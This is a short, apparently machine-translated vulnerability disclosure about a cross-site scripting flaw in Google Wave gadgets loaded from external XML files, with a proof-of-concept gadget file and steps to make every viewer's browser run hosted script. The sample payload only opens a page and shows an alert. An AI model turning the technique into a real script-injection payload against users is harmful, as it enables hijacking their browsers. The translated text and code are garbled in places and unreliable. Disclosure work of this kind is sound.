Google Wave XSS

Author:Shadowhider

Description:

Google WaveIs a network communication service provided by Google. It combines email and instant messaging to make communication easier. Wave Gadget is one of the two extensions of Google Wave. Gadgets is a fully functional application.
Wave Gadget can reference an xml file of an external domain to implement the functions required by users. HoweverWave GadgetBut there is no security restriction on the content of the referenced xml file, which leads to the xml file lineAttackers can execute arbitrary code.To be exploited by malicious users.

POC:

Create an xml file and write the following code:

01 <? Xml version = "1.0" encoding = "UTF-8"?> 02 <Module> 03 <ModulePrefs title = "Hello Wave"> 04 <Require feature = "wave"/> 05 </ModulePrefs> 06 <Content type = "html"> 07 <! [CDATA [ 08 <script type = "text/javascript"> 09 window. open (http://www.x3y3.org /) 10 alert (Just 4 Fun ~ By ShadowHider ); 11 </script> 12]> 13 </Content> 14 </Module> 15 </xml>

Then upload the xml file to any web space, as shown in figureHttp://www.x3y3.org/s.xml

LoginWave, SelectNew WaveAnd then selectAdd Gadget By URLTo enter the address of the xml file.

Then, the browser of the user browsing the wave will execute the code in the remote xml file:

Suggestion:

We have some suggestions and look forward to the official version of Google Wave.

Refer:
Html "target = _ blank>Http://code.google.com/intl/zh-CN/apis/wave/guide.html

The related discussions are as follows:Http://xeyeteam.appspot.com/2009/12/6/Google-Wave-XSS.html

PS: After Shadow is sent, it will flash. wave designers do not consider the security of remote loading of XML files.